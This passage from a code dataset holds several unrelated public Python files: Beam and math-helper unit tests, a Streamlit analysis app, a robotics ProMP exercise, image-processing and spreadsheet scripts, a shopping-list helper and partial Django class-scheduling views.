PipelineState.STOPPED \\\n and rm_2.describe()['state'] == PipelineState.STOPPED:\n\n self.assertGreater(rm_1.describe()['size'], 0)\n self.assertGreater(rm_2.describe()['size'], 0)\n rm_1.clear()\n self.assertEqual(rm_1.describe()['size'], 0)\n self.assertGreater(rm_2.describe()['size'], 0)\n\n rm_2.clear()\n self.assertEqual(rm_2.describe()['size'], 0)\n\n def test_record_pipeline(self):\n # Add the TestStream so that it can be cached.\n ib.options.recordable_sources.add(TestStream)\n p = beam.Pipeline(\n InteractiveRunner(), options=PipelineOptions(streaming=True))\n # pylint: disable=unused-variable\n _ = (p\n | TestStream()\n .advance_watermark_to(0)\n .advance_processing_time(1)\n .add_elements(list(range(10)))\n .advance_processing_time(1)) # yapf: disable\n\n # Watch the local scope for Interactive Beam so that referenced PCollections\n # will be cached.\n ib.watch(locals())\n\n # This is normally done in the interactive_utils when a transform is\n # applied but needs an IPython environment. So we manually run this here.\n ie.current_env().track_user_pipelines()\n\n # Create a lmiter that stops the background caching job when something is\n # written to cache. This is used to make ensure that the pipeline is\n # functioning properly and that there are no data races with the test.\n class SizeLimiter(Limiter):\n def __init__(self, p):\n self.pipeline = p\n self._rm = None\n\n def set_recording_manager(self, rm):\n self._rm = rm\n\n def is_triggered(self):\n return self._rm.describe()['size'] > 0 if self._rm else False\n\n # Do the first recording to get the timestamp of the first time the fragment\n # was run.\n size_limiter = SizeLimiter(p)\n rm = RecordingManager(p, test_limiters=[size_limiter])\n size_limiter.set_recording_manager(rm)\n self.assertEqual(rm.describe()['state'], PipelineState.STOPPED)\n self.assertTrue(rm.record_pipeline())\n\n # A recording is in progress, no need to start another one.\n self.assertFalse(rm.record_pipeline())\n\n for _ in range(60):\n if rm.describe()['state'] == PipelineState.CANCELLED:\n break\n time.sleep(1)\n self.assertTrue(\n rm.describe()['state'] == PipelineState.CANCELLED,\n 'Test timed out waiting for pipeline to be cancelled. This indicates '\n 'that the BackgroundCachingJob did not cache anything.')\n\n @patch(\n 'apache_beam.runners.interactive.recording_manager.'\n 'RecordingManager._clear_pcolls',\n return_value=None)\n @patch(\n 'apache_beam.runners.interactive.pipeline_fragment.'\n 'PipelineFragment.run',\n return_value=None)\n def test_record_detects_remote_runner(\n self, mock_pipeline_fragment, mock_clear_pcolls):\n \"\"\"Tests that a remote runner is detected, resulting in the\n PipelineFragment instance to have blocking enabled.\"\"\"\n\n # Create the pipeline that will emit 0, 1, 2.\n p = beam.Pipeline(InteractiveRunner())\n numbers = p | 'numbers' >> beam.Create([0, 1, 2])\n\n # Set the cache directory for Interactive Beam to be in a GCS bucket.\n ib.options.cache_root = 'gs://test-bucket/'\n\n # Create the recording objects. By calling `record` a new PipelineFragment\n # is started to compute the given PCollections and cache to disk.\n rm = RecordingManager(p)\n\n # Run record() and check if the PipelineFragment.run had blocking set to\n # True due to the GCS cache_root value.\n rm.record([numbers], max_n=3, max_duration=500)\n mock_pipeline_fragment.assert_called_with(blocking=True)\n\n # Reset cache_root value.\n ib.options.cache_root = None\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"apache/beam","sub_path":"sdks/python/apache_beam/runners/interactive/recording_manager_test.py","file_name":"recording_manager_test.py","file_ext":"py","file_size_in_byte":21385,"program_lang":"python","lang":"en","doc_type":"code","stars":7242,"dataset":"github-code","pt":"70"}
+{"seq_id":"35131218964","text":"#!/usr/bin/python3\n\"\"\"\ntests for Utilities.math_helpers\n\"\"\"\n\nimport os, sys\nsys.path.append(os.getcwd())\n\nimport unittest\nfrom Utilities import math_helpers\n\nclass HexagonalNumbers(unittest.TestCase):\n \"\"\"\n tests for Utilities.math_helpers.hexagonal_number_generator\n \"\"\"\n\n def test_generation(self):\n \"\"\"\n test that the hexagonal number generator generates hexagonal numbers, as expected.\n \"\"\"\n generator = math_helpers.hexagonal_number_generator()\n first_ten_hex_numbers = [next(generator) for _ in range(10)]\n canonical_values = [1, 6, 15, 28, 45, 66, 91, 120, 153, 190]\n self.assertEqual(canonical_values, first_ten_hex_numbers)\n\nclass PentagonalNumbers(unittest.TestCase):\n \"\"\"\n tests for Utilities.math_helpers.pentagonal_number_generator\n \"\"\"\n\n def test_generation(self):\n \"\"\"\n test that the pentagonal number generator generates pentagonal numbers, as expected.\n \"\"\"\n generator = math_helpers.pentagonal_number_generator()\n first_ten_pentagonal_numbers = [next(generator) for _ in range(10)]\n canonical_values = [1, 5, 12, 22, 35, 51, 70, 92, 117, 145]\n self.assertEqual(canonical_values, first_ten_pentagonal_numbers)\n\nclass IsPentagonal(unittest.TestCase):\n \"\"\"\n tests for Utilities.math_helpers.is_pentagonal\n \"\"\"\n\n def test_first_thousand_pentagonal_numbers(self):\n \"\"\"\n test that the first thousand pentagonal numbers are identified as such.\n \"\"\"\n generator = math_helpers.pentagonal_number_generator()\n first_thousand_pentagonal_numbers = [next(generator) for _ in range(1000)]\n all_pentagonal = all(map(lambda x: math_helpers.is_pentagonal(x), first_thousand_pentagonal_numbers))\n self.assertEqual(all_pentagonal, True)\n\n def test_very_large_pentagonal_numbers(self):\n \"\"\"\n test that even large pentagonal numbers are correctly identified as such\n (i.e. check whether we might expect to run into floating-point error)\n \"\"\"\n large_n = [x**9 for x in range(10000,10500)]\n pentagonals = [(n * (3 * n - 1)) // 2 for n in large_n]\n all_pentagonal = all(map(lambda x: math_helpers.is_pentagonal(x), pentagonals))\n self.assertEqual(all_pentagonal, True)\n\n def test_not_pentagonal(self):\n \"\"\"\n test some non-pentagonal numbers, make sure they don't show up as pentagonal.\n \"\"\"\n generator = math_helpers.pentagonal_number_generator()\n pents = set(next(generator) for _ in range(1000))\n non_pentagonals = set(x for x in range(max(pents)) if x not in pents)\n any_pentagonals = any(map(lambda x: math_helpers.is_pentagonal(x), non_pentagonals))\n self.assertEqual(any_pentagonals, False)\n\nclass TriangleNumbers(unittest.TestCase):\n \"\"\"\n tests for Utilities.math_helpers.triangle_number_generator\n \"\"\"\n\n def test_generation_index_zero(self):\n \"\"\"\n test that the generator yields the correct output when indexing from zero\n \"\"\"\n generator = math_helpers.triangle_number_generator()\n first_eleven_triangle_numbers = [next(generator) for _ in range(11)]\n canonical_values = [0, 1, 3, 6, 10, 15, 21, 28, 36, 45, 55]\n self.assertEqual(canonical_values, first_eleven_triangle_numbers)\n\n def test_generation_index_one(self):\n \"\"\"\n test that the generator yields the correct output when indexing from one\n \"\"\"\n generator = math_helpers.triangle_number_generator(1)\n first_ten_triangle_numbers = [next(generator) for _ in range(10)]\n canonical_values = [1, 3, 6, 10, 15, 21, 28, 36, 45, 55]\n self.assertEqual(canonical_values, first_ten_triangle_numbers)\n\nclass FirstNTriangleNumbers(unittest.TestCase):\n \"\"\"\n tests for Utilities.math_helpers.first_n_triangle_numbers\n \"\"\"\n\n def test_first_n_triangle_numbers(self):\n self.assertEqual(list(math_helpers.first_n_triangle_numbers(0)), [])\n self.assertEqual(list(math_helpers.first_n_triangle_numbers(1)), [1])\n self.assertEqual(list(math_helpers.first_n_triangle_numbers(5)), [1, 3, 6, 10, 15])\n\nclass Divisors(unittest.TestCase):\n \"\"\"\n tests for Utilities.math_helpers.divisors(n)\n \"\"\"\n\n def test_error_case(self):\n \"\"\"\n divisors(n) should throw errors if given input that is n < 1 or not a whole number.\n \"\"\"\n with self.assertRaises(ValueError):\n list(math_helpers.divisors(0))\n\n with self.assertRaises(ValueError):\n list(math_helpers.divisors(-2))\n\n with self.assertRaises(ValueError):\n list(math_helpers.divisors(3.5))\n\n def test_small_cases(self):\n \"\"\"\n test that it returns the correct output for small values\n \"\"\"\n case_one = list(math_helpers.divisors(1))\n self.assertEqual(case_one, [1])\n\n case_two = math_helpers.divisors(2)\n self.assertCountEqual(case_two, [1, 2])\n\n case_three = math_helpers.divisors(10)\n self.assertCountEqual(case_three, [1, 2, 5, 10])\n\n case_four = math_helpers.divisors(21)\n self.assertCountEqual(case_four, [1, 21, 3, 7])\n\n case_five = math_helpers.divisors(37)\n self.assertCountEqual(case_five, [1, 37])\n\n case_six = math_helpers.divisors(128)\n self.assertCountEqual(case_six, [1, 2, 4, 8, 16, 32, 64, 128])\n\n case_seven = math_helpers.divisors(11029)\n self.assertCountEqual(case_seven, [1, 41, 269, 11029])\n\n case_eight = math_helpers.divisors(6930)\n self.assertCountEqual(case_eight, [1, 2, 3, 5, 6, 7, 9, 10, 11, 14, 15, 18, 21, 22,\n 30, 33, 35, 42, 45, 55, 63, 66, 70, 77, 90, 99,\n 105, 110, 126, 154, 165, 198, 210, 231, 315, 330,\n 385, 462, 495, 630, 693, 770, 990, 1155, 1386,\n 2310, 3465, 6930])\n\nclass NumDivisors(unittest.TestCase):\n \"\"\"\n tests for Utilities.math_helpers.divisors(n)\n \"\"\"\n\n def test_cases(self):\n \"\"\"\n test that we get the correct output\n \"\"\"\n case_one = math_helpers.num_divisors(1)\n self.assertEqual(case_one, 1)\n\n case_two = math_helpers.num_divisors(10)\n self.assertEqual(case_two, 4)\n\n case_three = math_helpers.num_divisors(6930)\n self.assertEqual(case_three, 48)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Datamine/Project-Euler","sub_path":"Tests/math_helpers_test.py","file_name":"math_helpers_test.py","file_ext":"py","file_size_in_byte":6532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"6726209604","text":"import logging\nfrom TimeUtils import time_delta_calc_minutes\nfrom LocalCache import update_cache_time\nfrom galaxy.api.types import GameTime\n\nimport math\n\nfrom escapejson import escapejson\n\nasync def finished_game_run(self, start_time, game_id, local_time_cache):\n logging.debug(\"game finished\")\n logging.debug(game_id)\n my_delta = await time_delta_calc_minutes(start_time)\n logging.debug(my_delta)\n my_cache_update =[]\n placed_game = False\n for current_game in local_time_cache:\n if current_game[\"hash_digest\"] == game_id:\n logging.debug(\"game play time updated\")\n logging.debug(game_id)\n #update it if it exists in some form\n my_game_update = await created_update(current_game, my_delta, start_time)\n placed_game = True\n my_cache_update.append(my_game_update)\n else:\n #This entry doesn't need an update\n my_cache_update.append(current_game)\n if not placed_game:\n #new entry to be placed\n logging.debug(\"game played for the first time\")\n my_game_update = {} \n my_game_update[\"run_time_total\"] = my_delta\n my_game_update[\"last_time_played\"] = math.floor(start_time.timestamp() )\n my_game_update[\"hash_digest\"] = game_id\n my_cache_update.append(my_game_update)\n await update_cache_time(self, my_cache_update, self.backend.cache_times_filepath)\n my_game_id = escapejson(game_id)\n self.backend.my_queue_update_game_time.put(GameTime(my_game_id, my_game_update[\"run_time_total\"], my_game_update[\"last_time_played\"]))\n\nasync def created_update(current_game, my_delta, start_time):\n my_game_update = current_game.copy()\n if \"run_time_total\" in current_game.keys():\n logging.debug(\"updated play time\")\n my_game_update[\"run_time_total\"] = current_game[\"run_time_total\"] + my_delta\n else:\n logging.debug(\"new play time\")\n my_game_update[\"run_time_total\"] = my_delta\n my_game_update[\"last_time_played\"] = math.floor(start_time.timestamp() )\n return my_game_update\n","repo_name":"AndrewDWhite/GalaxyGenericImporterPlugin","sub_path":"src/TimeCache.py","file_name":"TimeCache.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"70"}
+{"seq_id":"6707858586","text":"import streamlit as st\nimport pandas as pd\nimport pandasql as ps\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nfrom sklearn import linear_model\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\n\n\nst.title('Headstarter Student Analysis')\ndf = pd.read_csv('HackathonDataset.csv')\n\nst.header('Full Data')\nst.write(df)\n\nst.header('Majors Bar Chart')\nmajor_counts = df['Major'].value_counts()\nprint(major_counts.head(10))\nst.bar_chart(major_counts)\n\nfilter_query = \"SELECT * FROM df WHERE Complain = 0 AND Headstarter_Rating >= 7\"\nfiltered_data = ps.sqldf(filter_query, locals())\nst.header('Filtered Data (Complaints and Low Ratings Removed)')\nst.write(filtered_data)\n\nincome = st.slider('How much Income?', 10000, 100000)\n# dual query of people who are not computer science majors and make less than 100k income\n# pyplot - see plots available\n# logistic regression\nst.header('Incomes Below Six Figures and Other Variables')\nmajor_income_query = f\"SELECT * FROM filtered_data WHERE Income < {income}\"\nincome_counts = ps.sqldf(major_income_query, locals())\nst.write(income_counts)\n\nfigOne = px.scatter(income_counts, x='Minutes_Spent_on_Headstarter', y=\"Income\")\nst.plotly_chart(figOne)\n\nfigTwo = px.scatter(income_counts, x='Days_Since_Last_Cohort', y=\"Income\")\nst.plotly_chart(figTwo)\n\nemails = st.slider('How many emails opened?', 0,20)\nst.header(\"Email Opens and Other Variables\")\nemails_query = f\"SELECT * FROM filtered_data WHERE Email_Opens <= {emails}\"\nemail_opens = ps.sqldf(emails_query, locals())\nst.write(email_opens)\n\nfigThree = px.scatter(email_opens, x='Email_Opens', y=\"Minutes_Spent_on_Headstarter\")\nst.plotly_chart(figThree)\n\n\nfigFive = px.scatter(email_opens, x='Email_Opens', y=\"Amount_Spent_On_Courses\")\nst.plotly_chart(figFive)\n\nfigSix = px.scatter(email_opens, x='Email_Opens', y=\"Videos_Watched\")\nst.plotly_chart(figSix)\n\nfigSeven = px.scatter(email_opens, x='Email_Opens', y=\"Site_Visits_Per_Month\")\nst.plotly_chart(figSeven)\n\n\nst.header('Education Filter')\neducation = st.radio(\"What's education level do you want to filter through?\",(\"'In-College'\", \"'High School'\", \"'Bachelors'\", \"'Masters'\", \"'PhD'\"))\nyoung_compsci_query = f\"SELECT * FROM filtered_data WHERE Education = {education}\"\nyoung_compsci = ps.sqldf(young_compsci_query, locals())\nst.write(young_compsci)\n\nst.header('MultiQuery')\nmulti_query = f\"SELECT * FROM filtered_data WHERE Education = {education} AND Income < {income}\"\nmulti_query_data = ps.sqldf(multi_query, locals())\nst.write(multi_query_data)\n\n\n#Linear Regression\ny = filtered_data['Probability_Of_Getting_Offer']\noffer_cols = ['Highest_Leaderboard_Rank', 'Minutes_Spent_Coding', 'Questions_Completed','Minutes_Spent_on_Headstarter']\nX = filtered_data[offer_cols]\n\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.25,random_state=0) \nlinreg = linear_model.LinearRegression() \nlinreg.fit(X_train,y_train) \ny_pred=linreg.predict(X_test)\nr_squared = linreg.score(X, y)\n\nprint(r_squared)\nerror = mean_squared_error(y_test, y_pred)\nprint(error)\n\nst.header('Machine Learning Model Results (Linear Regression)')\nst.subheader(f'R Squared: {r_squared}')\nst.caption('How accurate each data point is. The closer to 1, the more accurate.')\nst.subheader(f'Mean Error Squared: {error}')\nst.caption('Error between each data point and the expected.')\n\n#Google Neural Networks and Decision Trees","repo_name":"Sajid2001/Headstarter-Hackathon-Project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"28993803803","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom getImitationData import *\nfrom getProMPBasis import *\nfrom scipy.linalg import block_diag\ndef proMP (nBasis):\n\n dt = 0.002\n time = np.arange(dt,3,dt)\n nSteps = len(time);\n data = getImitationData(dt, time, multiple_demos=True)\n q = data[0]\n qd = data[1]\n qdd = data[2]\n\n bandwidth = 0.2\n # shape (Phi) = (30, 1499)\n Phi = getProMPBasis( dt, nSteps, nBasis, bandwidth )\n\n # y = [q, qd]\n w = np.matmul(np.linalg.pinv(Phi.transpose()),q.transpose())\n mean_w = np.mean(w,axis=1)\n cov_w = np.cov(w)\n # print np.std(w, axis=1)\n # print np.cov(w)\n\n # shape(w) = (30, 45)\n # Phi = np.transpose(Phi[0:nSteps])\n # plt.figure()\n # plt.hold('on')\n # plt.fill_between(time, np.dot(Phi.transpose(),mean_w) - 2*np.sqrt(np.diag(np.dot(Phi.transpose(),np.dot(cov_w,Phi)))), np.dot(Phi.transpose(),mean_w) + 2*np.sqrt(np.diag(np.dot(Phi.transpose(),np.dot(cov_w,Phi)))), alpha=0.5, edgecolor='#1B2ACC', facecolor='#089FFF')\n # plt.plot(time,np.dot(Phi.transpose(),mean_w), color='#1B2ACC')\n # plt.plot(time,q.transpose())\n # plt.title('ProMP learned from several trajectories(N=20)')\n # plt.title('Trajectories used for imitation.')\n # plt.pause(10)\n\n #Conditioning\n y_d = 3\n Sig_d = 0.0002\n t_point = np.round(2300/2)\n\n Phi_t_T = np.array(Phi[:, t_point])[np.newaxis]\n Phi_t = np.transpose(Phi_t_T)\n covw_phit = np.dot(cov_w, Phi_t)\n x1 = 1 / ( Sig_d + np.dot(Phi_t_T, covw_phit))\n mean_w_new = np.dot(covw_phit, np.dot(x1, y_d-np.dot(Phi_t_T, mean_w)))\n mean_w_new = np.asarray(mean_w + mean_w_new)\n cov_w_new = np.dot(covw_phit, np.dot(x1, np.dot(Phi_t_T, cov_w)))\n cov_w_new = np.asarray(cov_w - cov_w_new)\n\n plt.figure()\n plt.hold('on')\n # plt.fill_between(time, np.dot(Phi.transpose(),mean_w) - 2*np.sqrt(np.diag(np.dot(Phi.transpose(),np.dot(cov_w,Phi)))), np.dot(Phi.transpose(),mean_w) + 2*np.sqrt(np.diag(np.dot(Phi.transpose(),np.dot(cov_w,Phi)))), alpha=0.5, edgecolor='#1B2ACC', facecolor='#089FFF')\n # plt.plot(time,np.dot(Phi.transpose(),mean_w), color='#1B2ACC')\n # plt.fill_between(time, np.dot(Phi.transpose(),mean_w_new) - 2*np.sqrt(np.diag(np.dot(Phi.transpose(),np.dot(cov_w_new,Phi)))), np.dot(Phi.transpose(),mean_w_new) + 2*np.sqrt(np.diag(np.dot(Phi.transpose(),np.dot(cov_w_new,Phi)))), alpha=0.5, edgecolor='#CC4F1B', facecolor='#FF9848')\n # plt.plot(time,np.dot(Phi.transpose(),mean_w_new), color='#CC4F1B')\n sample_traj = np.dot(Phi.transpose(),np.random.multivariate_normal(mean_w_new,cov_w_new,10).transpose())\n plt.plot(time,sample_traj)\n # plt.title('ProMP after contidioning with new sampled trajectories')\n plt.title('New computed trajectories from sampled K=10 random weights vectors')\n plt.pause(20)\n","repo_name":"songyongkang/RobotLearning","sub_path":"Exercise2/python/proMP.py","file_name":"proMP.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"2087641017","text":"\"\"\"\nScript to extract resident move-in dates from raw data file.\n\"\"\"\n\nimport re\n\nimport pandas as pd\n\ndef reset_extracted_row():\n return {\n 'Unit': '',\n 'Name': '',\n 'Move_in_Date': '',\n 'Total': 0\n }\n\n\ndef main():\n waitlist_file = 'Parking_Waitlist_20191011_Cleaned.xlsx'\n\n move_in_file = 'Woodcliff_Move_In_Move_Out_Data_06122020.xlsx'\n sheets = pd.read_excel(move_in_file, sheet_name=None)\n extracted_data = []\n for name, sheet in sheets.items():\n print(f\"Processing sheet: {name}\")\n df = sheet\n df1 = df[['Unit', 'Resident', 'Move In', 'Unnamed: 9', 'Unnamed: 10']] # select only columns of interest\n df1 = df1.drop(df.index[0]) # drop second header row\n extracted_row = reset_extracted_row()\n for index, row in df1.iterrows():\n if re.match(r'.*Blvd.*', str(row.Unit), re.I|re.M):\n # print(row.Unit)\n extracted_row['Unit'] = '-'.join(re.search(r'(\\d+).?Blvd.*?#(.*?)$', row.Unit).groups())\n if not pd.isna(row.Resident):\n extracted_row['Name'] = row.Resident\n if not pd.isna(row['Move In']):\n extracted_row['Move_in_Date'] = row['Move In']\n if row['Unnamed: 9'] == 'Total':\n extracted_row['Total'] = row['Unnamed: 10']\n extracted_data.append(extracted_row)\n extracted_row = reset_extracted_row()\n\n df_extracted = pd.DataFrame(extracted_data)\n move_in_file_processed = move_in_file.split('.')\n move_in_file_processed.insert(1, '_processed')\n move_in_file_processed.insert(2, '.')\n df_extracted.to_excel(''.join(move_in_file_processed), index=False)\n print(\"Program completed.\")\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"plartoo/others","sub_path":"random_stuff/woodcliff/extract_resident_move_in.py","file_name":"extract_resident_move_in.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"6252756239","text":"from skimage import io\nimport numpy as np\nfrom scipy.ndimage import gaussian_filter\nfrom scipy.signal import convolve2d\nfrom matplotlib import pyplot as plt\n\nimg = io.imread('PCB.jpg', as_gray = True)\nimg1 = io.imread('PCB.jpg') # placeholder to indicate the corners later\n\nsmoothened_img = gaussian_filter(img, 1)\n\n# gradient along x-axis\nsobel_x = np.array([[-1, 0, 1],\n [-2, 0, 2],\n [-1, 0, 1]])\n\n# gradient along y-axis\nsobel_y = np.array([[-1, -2, -1],\n [0, 0 ,0],\n [1, 2, 1]])\n\n# Forming the structure tensor for the input image\ngrad_x = convolve2d(smoothened_img, sobel_x, mode = 'same', boundary = 'symm')\ngrad_y = convolve2d(smoothened_img, sobel_y, mode = 'same', boundary = 'symm')\ngrad_x_square = grad_x * grad_x\ngrad_y_square = grad_y * grad_y\ngrad_x_y = grad_x * grad_y\n\nsmoothened_grad_x_square = gaussian_filter(grad_x_square, 1)\nsmoothened_grad_y_square = gaussian_filter(grad_y_square, 1)\nsmoothened_grad_x_y = gaussian_filter(grad_x_y, 1)\n\nad = smoothened_grad_x_square * smoothened_grad_y_square\nbc = smoothened_grad_x_y * smoothened_grad_x_y\ntrace_matrix = smoothened_grad_x_square + smoothened_grad_y_square\ntrace_matrix_square = trace_matrix * trace_matrix\ndet_J = ad-bc\n\n# Computing the response by: det(J) - k Trace(M)^2, where k is an empirically chosen value\nk = 0.05\ncorner_matrix = (-k * trace_matrix_square) + det_J\n\n# Indicate corner pixels in red\nimg1[corner_matrix > k] = [255, 0, 0] \n\nfig, (ax1, ax2) = plt.subplots(1, 2)\nax1.imshow(img, cmap = 'gray')\nax1.set_title(\"Input Image\")\nax2.imshow(img1)\nax2.set_title(\"Result\")","repo_name":"madhoolikab/harris-corner-detector","sub_path":"harris_corner_detector.py","file_name":"harris_corner_detector.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70012269346","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n dic = {}\n maxi = c = 0\n for i in range(len(s)):\n if s[i] in dic:\n c = min(c+1,i-dic[s[i]])\n else: c += 1\n maxi = max(maxi,c)\n dic[s[i]] = i\n return maxi","repo_name":"dhananjaysahu79/DSA-problems","sub_path":"Leetcode Problems/longest-substring-without-repeating-characters.py","file_name":"longest-substring-without-repeating-characters.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"40527603749","text":"from asyncore import write\nimport re\nimport os\n\n\nclass ShoppingItem:\n def __init__(self, name, price, qty, store):\n self.name = name\n self.price = price\n self.qty = qty\n self.store = store\n\n def toString(self):\n return \"{} - {} - {}({})\".format(self.name, self.price, self.store, self.qty)\n\n\ndef GetListFromUser():\n userInput = \"\"\n shoppingList = []\n\n while userInput != \"stop\":\n userInput = input(\"Name: \")\n if userInput == \"stop\":\n break\n name = userInput\n userInput = input(\"Price: \")\n if userInput == 0:\n continue\n price = userInput\n userInput = input(\"Qty: \")\n if userInput == 0:\n continue\n qty = userInput\n userInput = input(\"Store: \")\n store = userInput\n newEntry = ShoppingItem(name, price, qty, store)\n shoppingList.append(newEntry)\n return shoppingList\n\n\ndef ReadFromFile(filename):\n shoppingList = []\n f = open(str(filename), \"rt\")\n try:\n with open(str(filename), \"rt\") as file:\n for line in f:\n line = line.rstrip(\"\\n\")\n firstParse = line.split(\" - \")\n secondParse = re.split(r\"\\(|\\)\", firstParse[2])\n name = firstParse[0]\n price = firstParse[1]\n qty = secondParse[1]\n store = secondParse[0]\n newEntry = ShoppingItem(name, price, qty, store)\n shoppingList.append(newEntry)\n f.close()\n except IOError:\n print(\"ERROR OPENING FILE\")\n return shoppingList\n\n\ndef IsUserSaving():\n userInput = input(\"Do you wish to save (yes/no)?\")\n if userInput == \"yes\":\n return True\n return False\n\n\ndef IsUserPostingToHabitica():\n userInput = input(\"Do you wish to send list to Habitica (yes/no)?\")\n if userInput == \"yes\":\n return True\n return False\n\n\ndef ConvertShoppingListToStringArray(shoppingList):\n resultArray = []\n for item in shoppingList:\n resultArray.append(item.toString())\n return resultArray\n\n\ndef PrintToFile(filename, shoppingList):\n if os.path.exists(filename):\n os.remove(filename)\n try:\n shoppingListStrings = ConvertShoppingListToStringArray(shoppingList)\n # open(filename, \"wt\")\n with open(filename, \"wt\") as file:\n writeString = \"\\n\".join(shoppingListStrings)\n file.write(writeString)\n file.close()\n except IOError:\n print(\"ERROR OPENING FILE\")\n","repo_name":"catalinp86/shopping-list-generator","sub_path":"PythonPOC/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"38473135155","text":"from django.shortcuts import get_object_or_404\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom .models import Class, Classes, Keyword\nfrom studios.models import Studio\nimport stripe\nimport time\n\nfrom accounts.models import Users as User\nimport json\nfrom datetime import datetime\nimport datetime\nfrom rest_framework.decorators import api_view\nfrom subscriptions.models import StripeUser, StripeUserLog\n\nWEEK_DAY_CODE = {'monday': 0, 'tuesday': 1, 'wednesday': 2,\n 'thursday': 3, 'friday': 4, 'saturday': 5, 'sunday': 6}\n\n\n@api_view(['POST'])\n@csrf_exempt\ndef CreateClasses(request, id):\n if request.method == \"POST\":\n if not request.user.is_superuser:\n return HttpResponse(\"Not Admin\", status=403)\n studio_id = id\n studio = Studio.objects.get(id=studio_id)\n if studio is None:\n return HttpResponse(\"No studio found\", status=404)\n classes_info = json.loads(request.body)\n name = classes_info.get('name')\n if Classes.objects.filter(name=name).exists():\n return HttpResponse(\"This class name already exists\")\n\n description = classes_info.get('description')\n coach = classes_info.get('coach')\n capacity = int(classes_info.get('capacity'))\n keywords = classes_info.get('keywords')\n weekday = classes_info.get('weekday')\n start_time = classes_info.get('start_time')\n end_time = classes_info.get('end_time')\n end_date = classes_info.get('end_date')\n\n new_classes = Classes(name=name, description=description,\n coach=coach, capacity=capacity, weekday=weekday, studio=studio)\n new_classes.save()\n\n for keyword in keywords:\n try:\n keyword_instance = Keyword.objects.get(keyword=keyword)\n except Keyword.DoesNotExist:\n keyword_instance = None\n\n if keyword_instance:\n new_classes.keywords.add(keyword_instance.id)\n else:\n new_keyword = Keyword(keyword=keyword)\n new_keyword.save()\n new_classes.keywords.add(new_keyword)\n\n today = datetime.date.today()\n week_day_code = WEEK_DAY_CODE[weekday]\n class_date = today + \\\n datetime.timedelta(days=-today.weekday() + week_day_code, weeks=1)\n class_end = datetime.date(\n end_date[\"year\"], end_date[\"month\"], end_date[\"day\"])\n class_start_time = datetime.time(\n start_time['hour'], start_time['minute'])\n class_end_time = datetime.time(end_time['hour'], end_time['minute'])\n new_classes.start_time = class_start_time\n new_classes.end_time = class_end_time\n new_classes.end_date = class_end\n new_classes.save()\n\n while class_date < class_end:\n new_class = Class(name=name, start_time=class_start_time, end_time=class_end_time, date=class_date,\n studio=studio, classes=new_classes, coach=coach)\n new_class.save()\n # new_classes.class_lst.add(new_class)\n class_date = class_date + datetime.timedelta(days=7)\n\n new_classes.save()\n\n return HttpResponse(\"Class Created Successfully\")\n\n\n@api_view(['POST'])\n@csrf_exempt\ndef EditClasses(request, id):\n if request.method == \"POST\":\n if not request.user.is_superuser:\n return HttpResponse(\"Not Admin\", status=403)\n studio_id = id\n studio = Studio.objects.get(id=studio_id)\n if studio is None:\n return HttpResponse(\"No studio found\", status=404)\n classes_info = json.loads(request.body)\n name = classes_info.get('name')\n altername = classes_info.get(\"altername\")\n description = classes_info.get('description')\n coach = classes_info.get('coach')\n capacity = classes_info.get('capacity')\n start_raw = classes_info.get(\"start_time\")\n end_raw = classes_info.get(\"end_time\")\n date_raw = classes_info.get(\"date\")\n\n classes = Classes.objects.get(studio=studio, name=name)\n class_lst = Class.objects.filter(studio=studio, name=name)\n\n if description is not None:\n classes.description = description\n\n if coach is not None:\n classes.coach = coach\n for class_inst in class_lst:\n class_inst.coach = coach\n\n if capacity is not None:\n classes.capacity = int(capacity)\n\n if altername is not None:\n classes.name = altername\n for class_inst in class_lst:\n class_inst.name = altername\n class_inst.save()\n\n if start_raw is not None:\n start = datetime.time(start_raw[\"hour\"], start_raw[\"minute\"])\n for class_inst in class_lst:\n class_inst.start_time = start\n class_inst.save()\n\n if end_raw is not None:\n end = datetime.time(end_raw[\"hour\"], end_raw[\"minute\"])\n for class_inst in class_lst:\n class_inst.end_time = end\n class_inst.save()\n\n if date_raw is not None:\n date = datetime.date(\n date_raw[\"year\"], date_raw[\"month\"], date_raw[\"day\"])\n class_lst.filter(date__gt=date).delete()\n\n classes.save()\n\n return HttpResponse(\"Edit Class Successfully!\")\n\n\n@api_view([\"POST\"])\n@csrf_exempt\ndef RemoveClass(request):\n if request.method == \"POST\":\n if not request.user.is_superuser:\n return HttpResponse(\"Not Admin\", status=403)\n class_info = json.loads(request.body).get('body')\n print(class_info)\n name = class_info.get('classname')\n date_raw = class_info.get('date')\n print(\"date raw\", date_raw)\n date = datetime.date(\n date_raw[\"year\"], date_raw[\"month\"], date_raw[\"day\"])\n if not Class.objects.filter(name=name, date=date).exists():\n return HttpResponse(\"This time slot or class name does not exist!\")\n class_to_remove = Class.objects.filter(name=name, date=date)\n class_to_remove.delete()\n return HttpResponse(\"Class 